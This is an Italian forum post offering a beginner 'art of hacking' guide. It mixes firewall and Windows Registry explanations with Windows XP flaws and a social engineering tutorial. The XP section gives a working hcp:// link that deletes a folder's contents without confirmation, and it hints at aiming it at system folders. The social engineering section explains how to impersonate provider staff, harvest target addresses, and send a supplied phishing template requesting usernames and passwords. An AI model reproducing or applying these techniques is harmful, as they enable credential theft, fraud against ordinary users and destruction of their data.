• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

[INFO] L'arte dell'hacking [INFO]

In questa sezione posterò due guide all hacking rapido molto utili ai principianti:

L'arte dell'hacking

Indice:

-Testiamo la sicurezza

-Regedit

-Bug di windows XP

-Social Engeneering

-Passi Hacker

-XSS (Cross Site Scripting)

-Testiamo la sicurezza del Nostro Sistema.



La prima cosa da Fare e assicurarci di essere protetti contro eventuali attacchi Hacker. Consiglio come Firewall Zone A L A R M , oltre a quello gia pre-istallato nel SP2 di XP.

Procuriamo un Buon Scanner tipo SuperScan V_x.x e facciamo una scanzione locale sulle nostre TCP/IP, stiamo ben attenti alle porte che compariranno aperte sul nostro sistema, e quindi chiudiamole con lo stesso Firewall.Ma cos’e in realta un Firewall? A che serve?

Firewall, ovvero un muro tagliafuoco. Un termine che rende benissimo l'idea del suo scopo reale.
Il firewall è quel dispositivo (hardware+software), che è posto a protezione di uno o più segmenti di rete. L'uso più classico del firewall è quello di proteggere una rete dalle connessioni non autorizzate provenienti da internet, ma questa è solo una delle innumerevoli funzionalità che offre un qualsiasi firewall, ma procediamo con ordine:
Internet è un mondo aperto e per questo anche mlto pericoloso, chiunque si affaccia su internet si espone a connessioni non autorizzate, sia che si tratti di un home user sia che si tratti di una grande azienda. Come possiamo difenderci da queste connessioni? La risposta è utilizzare un firewall, ovvero un dispositivo che, seguendo delle regole specificate da chi lo amministra, filtra tutte le connessioni entranti ed uscenti, permettendo il transito solamente delle sessioni esplicitamente dichiarate come "autorizzate".
E' possibile ad esempio configurare il firewall per permettere la navigazione web dall'interno della rete verso internet ma evitare altre connessioni potenzialmente dannose come il file sharing, escludendo quindi tutte le applicazioni come kazaa o winmx.
Il firewall è uno strumento di protezione, è la sentinella che regola il traffico da e verso la nostra rete interna, ma deve garantire anche una serie di funzioni aggiuntive come ad esempio l'autoprotezione (essendo un dispositivo di sicurezza a sua volta è soggetto ad attacchi), la possibilità di stabilire le VPN (Virtual Private Network), la possibilità di autenticare gli utenti e i client laddove necessario.
Amministrare un firewall è tutt'altro che semplice, scrivere quella che in gergo si chiama "rulebase", ovvero l'insieme delle policy che regolano il comportamento del firewall è considerata una vera e propria arte in quanto la rulebase dev'essere ottimizzata e non deve conenere punti deboli.

Esistono innumerevoli firewall, sia open source sia commerciali, che rispondono alle piu' svariate esigenze.

"Un firewall di rete invece è un sistema o un gruppo di sistemi che impone una politica di controllo dell'accesso tra due reti"
Questa può essere considerata una definizione abbastanza generica per un firewall. Ovviamente generalmente le due reti sono Internet e la propria LAN locale, a volte si sarà più interessati a regolamentare l'accessibilità delle proprie risorse da Internet e a volte a regolamentare l'accesso a Internet da parte degli utenti locali.
Per una analisi sui possibili usi fate riferimento alla sessione "A chi serve un firewall".
Le diverse funzioni di un firewall possono essere raggruppate in queste categorie:
Firewall per la Sicurezza (Statefull Packet Inspection)
Firewall come Filtro (in ingresso e in uscita)
Firewall come Gateway

Firewall per estensione della propria LAN (Accesso sicuro e LAN to LAN tramite Internet)

Ma chi ci garantisce che un firewall faccia il suo dovere e ci protegga dalla rete? Questo non è semplice e riguarda almeno due aspetti: la sicurezza e affidabilità del firewall e il modo con cui è stato installato. Per il primo fattore esistono degli organismi (generalmente formati dai principali produttori) che certificano che il firewall ha passato determinati test. Uno di questi organismi è l'ICSA
Il secondo aspetto riguarda la professionalità e la competenza dell'installatore. La cosa migliore è sicuramente affidarsi a persone preparate come lo staff di Eurosito.

Firewall per il Packet Inspection
Un firewall è in genere in grado di analizzare il contenuto di ogni pacchetto che passa attraverso esso. Questo è fondamentale per bloccare il traffico indesiderato o gli attacchi di hacker Internet senza complicare eccessivamente le configurazioni. Tipici esempi di packet Inspection sono la possibilità di filtrare gli attacchi Internet di tipo "denial of service" (il firewall riconosce che è in corso un tentativo di attacco verso una macchina Interna e lo blocca), la possibilità di verificare il sito in cui si sta navigando e il contenuto dello stesso per eventualmente bloccare o registrare comportamenti non consentiti. Il packet inspection è fondamentale per la realizzazione di un firewall di buon livello. Si parla di Statefull Packet Inspection nel momento in cui il firewall tiene traccia delle comunicazioni e quindi prende le decisioni (ammettere o meno una comunicazione) in base al contesto

Firewall come Filtro
Un firewall è in grado di filtrare il traffico in base al tipo di protocollo, all'indirizzo e alla porta sorgente e all'indirizzo e alla porta di destinazione. Questa funzione è espletata anche da diversi tipi di router (per es. il router Netopia), per cui il vero vantaggio dei firewall in questo caso sta negli strumenti di amministrazione e nel poter gestire tutte le varie funzionalità in modo centralizzato.


Una funzione fondamentale e' quella che viene generalmente indicata come 'Content Filtering': filtrare il traffico Web degli utenti interni (quindi è un traffico dalla rete locale verso Internet) in base al contenuto dei siti web o in base ad altre politiche.
Questo è importante per evitare un uso improprio di Internet con conseguente perdita di tempo e di produttività degli impiegati.


Firewall come Gateway
I firewall possono essere usati come gateway verso Internet. In questa ottica il firewall viene visto dalla rete locale come 'router', anche se generalmente sarà un altro router a realizzare la connessione fisica verso Internet. Se il firewall ha tre porte ethernet può gestire una rete sicura riservata ai propri server Internet e isolare la rete locale mediante la funzione NAT (Network Address translation). Con classici firewall a due porte si può ottenere la stessa configurazione tramite due firewall.



Regedit

Il Registro di configurazione è il cuore di Windows, ed è un'area in cui sono memorizzate tutte le impostazioni hardware e software del PC.Tutte le volte che si cambia qualcosa all'interno di un computer (installazione di un programma, cambio di componenti hardware, ecc...) vengono eseguiti dei cambiamenti all'interno di tale registro.

La modifica del registro di configurazione avviene attraverso l'editor Regedit.exe, per poterlo eseguire scegliere il pulsante Start\Esegui e digitare REGEDIT. La differenza fondamenale rispetto ad un qualsiasi altro programma è che ciascuna modifica viene apportata istantaneamente, non è richiesto alcun salvataggio, per cui bisogna stare molto attenti a quel che si fa altrimenti l'intero sistema potrebbe essere compromesso.

Windows ha una protezione contro gli errori che si possono commettere all'interno del registro creando ad ogni avvio riuscito dei file di backup del registro stesso. Potrebbe comunque succedere che il sistema si blocchi dopo l'aggiornamento delle copie di backup: in questo caso le copie sono identiche alle copie difettose. L'unico rimedio è quello di creare a priori una copia del registro di configurazione con il sistenma perfettamente funzionante in modo da poterlo recuperare successivamente.

Come è strutturato
Questo editor è strutturato, più o meno, come Esplora Risorse dunque non sarà per nulla difficile orientarsi:

E' possibile notare la struttura gerarchica come per Esplora Risorse, solo che quì ci sono chiavi e sottochiavi e non directory e sottodirectory. A destra si possono notare di valori (al posto dei file) i quali possono essere di diverso tipo: valore binario, stringa o valore dword. Il tipo di valore è riconoscibile anche dal simbolo che sta a destra del nome.
Tutte le informazioni presenti nel registro sono memorizzate nel file SYSTEM.DAT e USER.DAT. Nel primo file ci sono informazioni riguardanti il computer (all chiave HKEY_LOCAL_MACHINE) mentre nel secondo sono presenti i dati dell'utente (alla chiave HKEY_USER).

SYSTEM.DAT

HKEY_LOCAL_MACHINE

Sono presenti all'interno di tale chiave indicazioni sull'hardware e sulle impostazioni software generiche che interessano tutti gli utenti del computer. Le sottochiavi presenti sono:
Config configurazione
Enum settaggi hardware
Hardware comunicazioni seriale e le impostazioni delle porte
Network Security sicurezza rete
Software indicazioni dettagliate riguardante il software
System avvio del sistema e informazioni sui driver.

HKEY_DYN_DATA


HKEY_CLASSES_ROOT


HKEY_CURRENT_CONFIG







Questa chiave contiene tutti i parametri hardware correnti meorizzate nella ram.
Tali informazioni vengono aggiornate in tempo dinamicamente all'aggiunta di dispositivi.


Contiene informazioni rigurdanti OLE e le associazioni dei file di sistema (informazioni riguardanti le operazioni di drag-and-drop, i collegamenti e altre informazioni sull'interfaccia utente).


All'interno di questa chiave si gestisce il plug&play.









USER.DAT

HKEY_USER

HKEY_CURRENT_USER





HKEY_USERS\.DEFAULT

Questa chiave punta al ramo di HKEY_USERS con il nome dell'utente attivo. Le sottochiavi sono:
AppEvents: indica il suono da eseguire al verificarsi di un evento.
Control Panel: contiene informazioni sul Pannello di Controllo. InstallLocationsMRU: Elenco delle directory che l'utente può scegliere quando il Setup richiede un percorso per l'installazione.
Keyboard layout: notizie sulla tastiera,
Network: notizie sulla connessione
Remote Access: notizie su Accesso Remoto,
Software: informazioni sull'attuale configurazione software





Contiene dati genericidisponibili per tutte gli utenti del computer





Opzioni
Regedit ha un gran numero di opzioni per automatizzare alcuni passaggi (che altrimenti richiederebbero interazione con l'utente) o per creare delle procedure batch.
La sintassi del comando Regedit è la seguente:
regedit [opzioni] [nomefile]

[nomefile.reg]
è il file che si vuole importare all'interno del registro

[opzioni]
/s non chiede conferma quando si vuole imporare un file .reg
/e esporta un file del registro
/L:system Specifica il percorso del file system.dat da usare
/R:user Specifica il percorso del file user.dat da usare
/C Comprime [nomefile] (solo per Windows 98)

AVVERTENZE
Se si vuole modificare il registro di configurazione bisogna premunirsi contro i danni che si possono creare. La cosa assolutamente necessaria è una copia dell'intero registro quando è installato un OS perfettamente funzionante. Per fare ciò fare clic su Start\Esegui e digitare Regedit. Una volta aperto il registro scegliere File\Esporta File del Registro di Configurazione, scegliere come intervallo di esportazione "Tutto" e salvare il file, per esempio, in c:\buono.reg. Fatto ciò se per qualsiasi motivo il pc non dovesse più partire o il sistema operativo cominciasse a dare i numeri, per ripristinare il registro di configurazione basta avviare il pc in modalità DOS e al prompt digitare regedit /c c:\buono.reg.

Windows 9x non parte
Può capitare che, dopo aver premuto il tasto di accensione del PC, il sistema operativo si blocca. Cosa bisogna fare nei casi in cui l'interfaccia grafica non viene avviata?

Bisogna sapere, innanzitutto che il registro di configurazione ogni giorno viene salvato sotto forma di file compresso (con estenzione .CAB) nella directory C:\Windows\Sysbckup.

In realtà in ognuno di questi file compressi sono presenti i file User.dat, System.dat, System.ini e Win.ini:

Per far ripartire il PC bisogna ripristinare i file User.dat e System.dat dal file rb000.cab (per es.)
1- Avviare il PC tenedo premuto il tasto F8 o CTRL e scegliere dal menù di avvio che compare "Prompt dei comandi con supporto di rete"
2-digitarecd c:\windows;
3 - digitare c:\scanreg /restore
4- Riavviare il PC.



Bug di windows XP

L'obiettivo che Microsoft voleva raggiungere con la diffusione del Service Pack 2 era quello di rendere più sicuro il suo Windows XP, invece sembra proprio che tale sicurezza sia lontana dall'essere raggiunta. Infatti alcuni esperti hanno evidenziato un exploit in grado di colpire i computer dotati di sistema Windows XP SP2. La falla è piuttosto difficile da sfruttare poiché nasce dall'unione della vulnerabilità di Internet Explorer 6 con una serie di exploit di ActiveX. La combinazione di questi due fattori porta alla violazione delle impostazioni di sicurezza di SP2. La vulnerabilità si attiva se un utente dovesse spostare un file o un'immagine da una parte di una pagina Web ad un'altra, durante il processo l'exploit scarica un codice che aggira le impostazioni di sicurezza dell'area Local Computer di SP2. Secondo il parere degli esperti questa è la vulnerabilità più seria che sia stata riscontrata all'interno di Windows XP SP2.

Protocollo HCP

Il problema, derivante da una falla di sicurezza del protocollo Hcp, si presenta nei sistemi Windows XP:
tramite un semplice link ipertestuale è possibile cancellare completamente il contenuto di una cartella
sul vostro disco!


Esempio:

seguite passo per passo le seguenti istruzioni, andremo a riprodurre l'errore sul vostro
sistema (senza causare danni ovviamente):
Create una cartella sul disco C, ad esempio chiamandola "Prova", successivamente copiate all'interno
qualche file di cui avete un backup oppure qualche file destinato al cestino (importante:
questi file andranno irrimediabilmente persi, quindi sceglieteli con molta attenzione).

Create un file .htm, al cui interno inserirete un link che punti a
hcp://system/DFS/uplddrvinfo.htm?file://c:\prova\*.*
Alternativamente è possibile utilizzare direttamente il file .htm creato appositamente per questa verifica.
Aprite con Internet Explorer il file .htm appena creato e cliccate sul link. Dopo qualche secondo si
aprirà la "Guida in linea" del sistema operativo e per magia i file contenuti in c:\prova verranno
cancellati senza alcuna richiesta di conferma!
Immaginate ora questa possibilità in mano a fantomatici Webmaster in vena di brutti scherzi...
magari su cartelle come c:\windows!
Problema risolto con SP2

Se nn avete il SP2 o lo scaricate dalla Microzozz, oppure
è possibile mettere una "toppa" indolore semplicemente modificando un file. Fate una copia di backup del
file c:\windows\PCHEALTH\HELPCTR\System\DFS\uplddrvinfo.htm, successivamente apritelo con un editor di
testo (ad esempio il Blocco Note) e davanti alla riga "oFSO.DeleteFile( sFile );" mettete due slash
come questi "//", senza le virgolette chiaramente, in questo modo la riga viene commentata e non più
eseguita



XP e la CPU al 100%

Ho scritto recentemente del misterioso effetto che si produce in Windows XP destrocliccando su un file e
lasciando aperto il menu che compare: l'uso del processore schizza al 100%. Inizialmente non era chiaro
se si trattava di un errore di misurazione o di un effettivo consumo, ma ora è arrivata la conferma di
Microsoft:

Perfavore, Entra oppure Registrati per vedere i Link!


Il "temporaneo calo di prestazioni" (come lo chiamano quelli di Redmond) affligge XP Home e
Professional (anche con SP1 e SP1a), e può causare interruzioni di operazioni di copia di file,
rallentamenti delle connessioni di rete, e distorsioni nell'audio in streaming. La "soluzione"
consiste nel disattivare gli "effetti di transizione" (non so come si chiamano in XP italiano):
"Turn off the transition effects for menus and ToolTips", come spiegato nella pagina Microsoft sopra citata.
In alternativa, potete semplicemente cliccare sul file desiderato col pulsante sinistro prima di
cliccarvi sopra col destro.
Ogni commento è superfluo.



Altri Bugs di XP

E' stato da poco scoperto un bug che riguarda la shell di Windows XP.

Sfruttando questo problema, un utente malintenzionato, può creare un file eseguibile facendolo apparire,
sul "sistema vittima", come una normale cartella. L'utente, ignaro del tranello, qualora tentasse di
aprire la "falsa" cartella, ne eseguirebbe, a sua insaputa, il pericoloso contenuto. Se tale cartella
fosse un file HTML, la shell di Windows XP ne attiverebbe il contenuto anche qualora, ad esempio, ne
venisse richiesta l'anteprima.
Al momento non è stata ancora rilasciata una patch correttiva.



Windows XP / Service Pack 2

Questo sistema operativo è presente oramai in tutti i nostri computer. Windows XP sembrà essere la nuova
realtà e per certi versi il futuro dei sistemi operativi. (sempre pieni di bug ) Ecco come aggiornarlo
e eliminare tutti i bug fin'ora conosciuti.

E'disponibile il primo aggiornamento in lingua italiana per Windows XP: il Service Pack 1.
L'aggiornamento comprende:

Tutte le patch per la sicurezza e i bug finora pubblicate

Nuova funzione AutoUpdate 2.0
Internet Explorer 6 SP1
Supporto per nuove periferiche e applicazioni (es. USB 2.0)
Application Compatibility (verifica la compatibilità di applicazioni con Windows XP)
Modulo .NET Framework
Il nuovo "middleware module"
Protezione contro le copie pirata
Middleware module
Le novità più grande a mio avviso è l'introduzione del "middleware module" che renderà facoltativa
l'installazione di Media Player, Outlook, Messenger e la Java Virtual Machine. In altre parole potremo
scegliere alternative alle proposte Microsoft optando per altri programmi di terze parti.


Protezione contro le copie pirata

Il SP2 prevede una protezione contro le copie pirata: non sarà possibile installare il SP1 se non si
possiede un numero di serie valido. Se si ha una versione di Windows XP con crack l'installazione
sarà possibile, ma, attenzione, al riavvio probabilmente si perderanno tutte le agevolazioni e
potrebbe essere necessaria una nuova procedura di attivazione: ciò è dovuto al fatto che molti
file del sistema verranno modificati.



Microsoft di nuovo alle prese con vulnerabilità inattese. Questa volta si tratta di tre problemi con la
Java Virtual Machine fornita con Windows e IE e due con i Terminal Services. Tutti bachi classificati a
medio o alto rischio.

La JVM di Microsoft è afflitta da tre vulnerabilità, la più grave delle quali, come viene descritto nel
bollettino MS02-052, può consentire ad un aggressore di "guadagnare il pieno controllo sul sistema di
un utente".
Un cracker può sfruttare queste falle confezionando una pagina o una e-mail HTML che contengano codice
malevolo. Microsoft ha rilasciato una patch scaricabile direttamente dal Windows Update. È curioso
notare come il bollettino di sicurezza di Microsoft rimandi, per il download della correzione,
direttamente al servizio Windows Update, omettendo, come tradizione, il link ad una versione stand-alone
della patch. C'è da chiedersi se vi sia qualche legame con l'imminente introduzione, nel noto servizio
di aggiornamento via Web, di un meccanismo per il riconoscimento di eventuali numeri seriali piratati
di Windows XP.



La prima delle tre vulnerabilità è causata da una debolezza nei controlli di sicurezza effettuati da
alcune classi Java Database Connectivity (JDBC) che gestiscono le richieste ai database: un cracker
potrebbe essere in grado di aggirare questi controlli e caricare/eseguire qualsiasi DLL presente
sul sistema dell'utente.
La seconda falla riguarda ancora alcune classi JDBC e consiste in una non corretta validazione di
alcuni handle forniti come input: questa debolezza potrebbe essere sfruttata da un cracker per mandare
in crash IE o, in alcuni rari casi, eseguire del codice nello stesso contesto di sicurezza dell'utente.
Il terzo buco è contenuto in una classe che fornisce il supporto a XML alle applicazioni Java e
consiste nella possibilità, per un aggressore, di creare applet Java in grado di aggirare i controlli
della classe e accedere ai suoi metodi: questo, secondo Microsoft, darebbe ad un malintenzionato la
capacità di compiere "virtualmente ogni azione desiderata sul sistema dell'utente".
Nel bollettino di sicurezza MS02-151 Microsoft descrive invece un problema riguardante il protocollo
utilizzato nei Terminal Services, il software per la connessione remota ad un computer che, in Windows XP,
può essere installato insieme al sistema operativo con il nome Desktop Remoto.
Una falla nel Remote Desktop Protocol (RDP) di Microsoft potrebbe dare la possibilità ad un aggressore
di "sniffare" la comunicazione fra due PC: questo lo renderebbe in grado di decifrare quanto digitato
dagli utenti, come password e altri dati sensibili.
Sebbene Microsoft abbia rilasciato un avviso di sicurezza e una patch soltanto in questi giorni,
The Register sostiene che il baco era noto fin dallo scorso aprile, mese in cui lo sviluppatore
Ben Cohen, della società di sicurezza Skygate, avrebbe notificato a Microsoft il problema. Il noto
magazine on-line sostiene poi che big di Redmond ha integrato la patch nel Service Pack 1 per
Windows XP senza rendere la vulnerabilità di pubblico dominio.
Sulla celebre mailing-lits di sicurezza BugTraq la descrizione della falla è apparsa in un post risalente
allo scorso lunedì.
Nella maggior parte dei casi questa breccia, classificata da Microsoft di medio rischio, può essere
sfruttata solo se l'aggressore ha fisicamente accesso alla rete.
Pete Chown, capo della sicurezza in Skygate, ha descritto in questo advisory un altro problema legato
al Desktop Remoto di Windows XP, questa volta considerato meno serio del precedente e sfruttabile per
attacchi di tipo denial of service.

Social Engeneering

E` il metodo piu` semplice ed efficace per ottenere informazioni che altrimenti non sapreste dove trovare, come ad esempio la password di un utente, o addirittura i suoi dati personali (indirizzo, telefono, ecc).
Sono solo esempi, ma con un po` di fantasia e fortuna potete fare davvero di tutto. Non si tratta, nel caso ve lo stiate chiedendo, di tecniche come quelle che abbiamo visto fino ad ora: niente Telnet, niente file di log, solo voi e la vostra intelligenza.

Ma procediamo per ordine.

Fare del "Social Engineering" significa far credere di essere qualcun altro allo scopo di ottenere qualcosa.
Immaginate di andare dalla segretaria di Bill Gates a chiederle di versare sul vostro conto un paio di milioni. Al massimo vi ridera` in faccia... Ma se invece fosse lui, il "caro" Bill, a telefonare alla sua segretaria da
una riunione d'affari e dirle di sbrigare un attimino una faccenda urgente per conto suo.... ho reso l'idea?
Beh, normalmente ci si limita ad utilizzare il Social Engineering per ottenere password e dati personali, ma l'uso e` lasciato a voi.
Si puo` fare S.E. (Social Engineering) per telefono o via modem (e Internet).

Le regole sono semplici:

- dovete agire "professionalmente" ed essere credibili - dovete informarvi sull'argomento che state per affrontare

e, se utilizzerete il telefono:

- dovete essere sicuri di voi stessi e di quello che dite - dovete avere una voce credibile, che non sia cioe` quella di un ragazzo che vuole sfottere un po` per telefono...

Per quelli che tra voi stanno pensando che il S.E. non funziona: vi basti sapere che praticamente tutti gli hackers piu` conosciuti utilizzano proprio il S.E. per ottenere le informazioni di cui hanno bisogno. E` l'unica "tecnica" che, se fatta come si deve, non fallisce e non diventa obsoleta con il passare del tempo.

Ma ora veniamo alla pratica.

Supponiamo ad esempio di voler ottenere la password di un utente (sia essa la password del suo account Internet oppure quella della sua mailbox).

In quale caso potremmo chiedere a un utente la sua password?

Probabilmente, nel caso in cui fossimo il SysAdmin (o un tecnico del servizio utenti) del suo provider.

In questo caso, non dovremo fare altro che crearci un account di email su usa.net mailexcite.com che possa sembrare l'indirizzo email di un tecnico del provider, come ad esempio servizio_utenti@usa.net o altro.

Meglio ancora, se avete un account di posta elettronica potete usare iNAME (
Perfavore, Entra oppure Registrati per vedere i Link!
) per creare un account email "virtuale". Potrete cioe` crearvi un account come ad esempio servizio_tecnico@fastservice.com (che e` MOLTO piu` credibile di pippo@hotmail.com) e tutta la posta che verra` inviata a quell'account sara` ridirottata anonimamente sul vostro account normale. Potrete scegliere tra vari nomi di server, e cio` torna a vostro favore.
Se state fingendo di essere del servizio tecnico o help utenti di un provider scegliete qualityservice.com, opservice.com, oppure cyberservices.com.

Ora viene il bello. Supponiamo di voler ottenere una password di un server senza allarmare il SysAdmin tentando di prelevare il file delle password

Cio` che vi serve e` l'indirizzo di email di un utente qualsiasi di QUEL server. Come trovarlo: se il server ha una messaggistica, un forum dove gli utenti possono chiacchierare... vedete li`. Altrimenti non scoraggiatevi: collegatevi a
Perfavore, Entra oppure Registrati per vedere i Link!
oppure a
Perfavore, Entra oppure Registrati per vedere i Link!
e cercate il server che vi interessa. Avrete una lista di tutte le email che vi possono interessare, complete di nome e cognome che vi torneranno certamente utili. Oppure potete usare finger, se e` abilitato... facendo "finger @server.com" avrete la lista di tutti gli utenti presenti su quel sistema.
Come vedete, ci sono molti modi per ottenere la stessa cosa.

Fate MOLTA ATTENZIONE a non scrivere all'indirizzo del SysAdmin, del Webmaster o di uno dei responsabili o dei tecnici del server!

Trovata la "cavia" ora dovete scrivergli un messaggio di questo tipo:

--->


Da: Servizio_Tecnico@TopService.com
A: utente@provider.it
Soggetto:

Gentile Utente,

per offrirLe un miglior servizio abbiamo aggiornato il server software del ns. Internet Provider. Per problemi tecnici non ci e` stato possibile importare il database Utenti, motivo per cui La preghiamo di volerci comunicare al piu` presto il suo username e la sua password, scrivendo al nostro indirizzo email: Servizio_Tecnico@TopService.com

La ringraziamo per la cortese attenzione.

Cordiali saluti

Dr. Antonio Brambilla
Resp. Servizio Tecnico
XXXX Internet Provider
Via ................
Tel/Fax ............


<---

Poche righe, insomma, ma ben scritte.
E per rendere piu` convincente il tutto, aggiungete anche informazioni come indirizzo (vero) e nomi e cognomi (falsi), telefono e fax (falsi), ecc...

Vi meraviglierete di come talvolta anche le societa` che si appoggiano ai provider per l'accesso a Internet cascano in questi trucchi.

NOTA: in alcuni casi puo` essere utile utilizzare la tecnica delle FakeMail per inviare un "ordine di servizio" a qualcuno da parte di una persona (un dirigente, ad esempio) di cui si conosca pero` l'indirizzo di email. Ricordate pero` che, in caso di risposta, l'email andra` all'indirizzo falso che avremo utilizzato (cioe` quello del dirigente!).

Se avessimo invece voluto fare qualcosa di piu` complicato, come ottenere un qualche tipo di informazioni piu` o meno riservate da una grande azienda, avremmo dovuto utilizzare (preferibilmente) il telefono. Avere prontezza di riflessi, sicurezza e una voce "adatta allo scopo" in tal caso sara` indispensabile se non si vuole mandare tutto a monte.

Nel caso di personale particolarmente attento (raro...), del tipo che vuole chiedere prima un'autorizzazione al capo e roba del genere, e` utile far capire di avere altri affari da sbrigare, di essere seccati dall'inettitudine di quell'impiegato e roba del genere... perdere la pazienza, insomma, senza essere ne` patetici ne` isterici.


Passi Hacker

per riconoscere le minacce esistenti e scoprire come affrontarle è necessario avere un minimo di conoscenze tecniche. Non è il caso di preoccuparsi, ci limiteremo allo stretto indispensabile.

Reti, inter-reti e Internet

Il computer in sé è qualcosa di straordinario, una meraviglia tecnologica. Ma il suo punto di forza sta nel consentire la comunicazione. Basta collegare tra di loro due o più computer mediante schede di rete e cavi (o attraverso una configurazione senza fili) per ottenere una rete locale, o LAN (Local Area Network). Tutti i computer connessi in rete possono condividere dati e sistemi di posta elettronica, nonché accedere a risorse condivise come stampanti, modem o connessioni a Internet a banda larga. Collegando tra di loro due o più LAN si ottiene una rete remota, o WAN (Wide Area Network). Per esempio, attraverso una linea dedicata è possibile collegare tra di loro due uffici ubicati in luoghi diversi.

Collegando tra di loro più reti si ottiene una inter-rete. Le informazioni contenute in un computer connesso a una rete qualsiasi possono essere trasmesse a qualsiasi altro computer connesso a qualsiasi altra rete tramite l'inter-rete, che funge da portante comune. Una inter-rete può essere descritta come una rete autostradale che collega i diversi sistemi viari locali.

Internet non è altro che una inter-rete a livello mondiale. Tutti i computer connessi a Internet comunicano tramite protocolli standard, cosicché le informazioni trasmesse da qualsiasi computer connesso possono essere ricevute da tutti gli altri. E qui iniziano i problemi: finché non ci si connette a una rete pubblica si è relativamente al sicuro da minacce esterne. Attivare un collegamento a Internet, d'altro canto, equivale a rendere pubblici il proprio nome, indirizzo e numero di telefono e a dichiarare di possedere uno o più computer.

Pacchetti

In genere, le informazioni viaggiano attraverso le reti sotto forma di pacchetti. Per pacchetto si intende un insieme di dati corredati da un indirizzo e da altre informazioni che consentono alle reti di inviarli dove richiesto. Tutto ciò che viaggia su Internet viene suddiviso in pacchetti: pagine Web, messaggi e-mail, file scaricabili, ecc... È un po' come organizzare il trasporto di un circo: è impensabile cercare di trasportare l'intero circo in un unico veicolo. È necessario suddividerlo in veicoli separati, informare ciascuno di essi sulla rispettiva destinazione e, una volta arrivati, provvedere a ricomporre il circo. Così come i veicoli sulle strade, i pacchetti sono fisicamente connessi e si spostano a flussi. I dati più voluminosi sono suddivisi in una serie di pacchetti e ricomposti una volta arrivati a destinazione. Durante la trasmissione in Internet, i pacchetti sono effettivamente esposti a "orecchie indiscrete".

Porte e indirizzi

A ciascun computer collegato in rete viene assegnato un numero univoco, denominato indirizzo IP. L'indirizzo IP definisce in modo univoco un computer in rete e fornisce ai pacchetti di dati tutte le informazioni necessarie perché giungano a destinazione. Gli indirizzi IP possono essere considerati alla stregua di indirizzi stradali. Una parte dell'indirizzo indica il segmento di rete del computer di destinazione, mentre l'altra identifica il computer vero e proprio.

Come abbiamo visto, l'indirizzo IP si riferisce al computer e al segmento di rete su cui esso si trova, ma non basta. È necessario che anche le applicazioni installate sul computer in questione possano essere identificate. Si pensi al numero di un appartamento compreso in un indirizzo stradale: l'indirizzo stradale indica l'edificio in cui si trova l'appartamento, mentre il numero indica l'appartamento vero e proprio. Allo stesso modo, l'indirizzo IP indica il computer, mentre il numero della porta indica il programma installato sul computer. A tutti i programmi installati su un computer che devono inviare e ricevere dati in rete viene assegnato un determinato numero di porta. Quando i pacchetti di informazioni vengono ricevuti in corrispondenza di un dato numero di porta, il computer è in grado di identificare l'applicazione che riceve il pacchetto. Ad esempio, la porta 80 è la porta dei server Web (ovvero i server che ospitano i siti Web che si consultano tramite il browser), mentre la porta 25 viene utilizzata per l'invio di messaggi e-mail. I pacchetti vengono dunque indirizzati a una porta specifica presso uno specifico indirizzo IP.

Firewall

I firewall vengono utilizzati per bloccare il traffico di rete attraverso le porte specificate. In questo modo, il computer dotato di firewall può comunque accedere ai servizi presenti su altri computer, ma non viceversa. Alcuni firewall esaminano i pacchetti in entrata e talvolta quelli in uscita dalla rete per assicurarsi che siano autentici e bloccano quelli sospetti. Inoltre, i firewall nascondono le identità dei computer interni alla rete aziendale per evitare che i pirati informatici possano prendere di mira macchine singole.

Server

Un server non è altro che un computer collegato alla rete, ma che assolve funzioni specifiche, quali condividere una stampante, memorizzare file o rendere disponibili le pagine Web. Anche i notebook o i desktop connessi a Internet in un certo senso possono essere considerati dei server e, in mancanza di firewall, sono esposti alla ricezione di traffico indesiderato dal Web.

Virus, worm, Trojan Horse, spamming e falsi messaggi
Tramite la posta elettronica ogni anno vengono inviati miliardi di messaggi, molti dei quali, purtroppo in numero sempre maggiore, sono da considerare pericolosi. Nell'agosto 2003, un'azienda produttrice di sistemi di protezione e-mail analizzò 413 milioni di messaggi. Il 3% conteneva un virus, il 52% era posta indesiderata e in gran parte dei casi conteneva un'immagine pornografica. Le principali minacce diffuse attraverso la posta elettronica sono cinque:
Virus, ovvero programmi concepiti per replicarsi e, potenzialmente, arrecare danno. Spesso vengono nascosti all'interno di programmi innocui. All'interno dei messaggi e-mail, i virus spesso si camuffano da giochi o immagini e ricorrono a oggetti ingannevoli (ad esempio: "Foto della mia ragazza nuda") per invogliare gli utenti ad aprirli ed eseguirli. I virus cercano di replicarsi infettando gli altri programmi installati sul computer.


Worm, simili ai virus ma, anziché infettare i programmi installati su un computer, sono in grado di inviare dei messaggi e-mail al fine di replicarsi.


Trojan Horse, ovvero programmi dannosi che si camuffano da applicazioni innocue. A differenza di virus e worm, non sono in grado di replicarsi ma sono comunque in grado di causare danno. Virus e worm vengono spesso occultati all'interno di un Trojan Horse.


Spamming o messaggi di posta elettronica indesiderati, che utilizzano grandi quantità di larghezza di banda e causano notevoli perdite di tempo. Il volume complessivo dello spamming è spesso impressionante e può costituire un veicolo per la diffusione di virus. Generalmente, si tratta di messaggi sessualmente espliciti, che possono creare un ambiente di lavoro oppressivo e causare potenziali responsabilità legali qualora le aziende non si attivino per arginare il fenomeno.


Falsi messaggi di posta elettronica, quali avvertimenti fasulli sui virus, catene o improbabili offerte gratuite sono solo una perdita di tempo per chi legge. Inoltre, i falsi messaggi di posta elettronica spesso contengono virus o Trojan Horse.
Motivi della vulnerabilità del software
Non è certo nelle intenzioni degli sviluppatori scrivere programmi software non sicuri. Un sistema operativo, ad esempio, è il prodotto di decine di migliaia di ore di lavoro ed è costituito da milioni di righe di codice. Una semplice svista o un bug possono fornire un punto di accesso inatteso ad un sistema altrimenti sicuro. Sviluppare software totalmente privo di bug è impossibile. Certo, ciò non significa che non si debba comunque continuare a tentare.

Ci sono poi i malintenzionati. Willie Sutton, svaligiatore di banche di professione, dichiarò: "Rapino le banche perché è lì che si trova il denaro". Per i programmi software è esattamente lo stesso. Più un programma software è conosciuto e diffuso, più sarà oggetto di attacchi informatici.

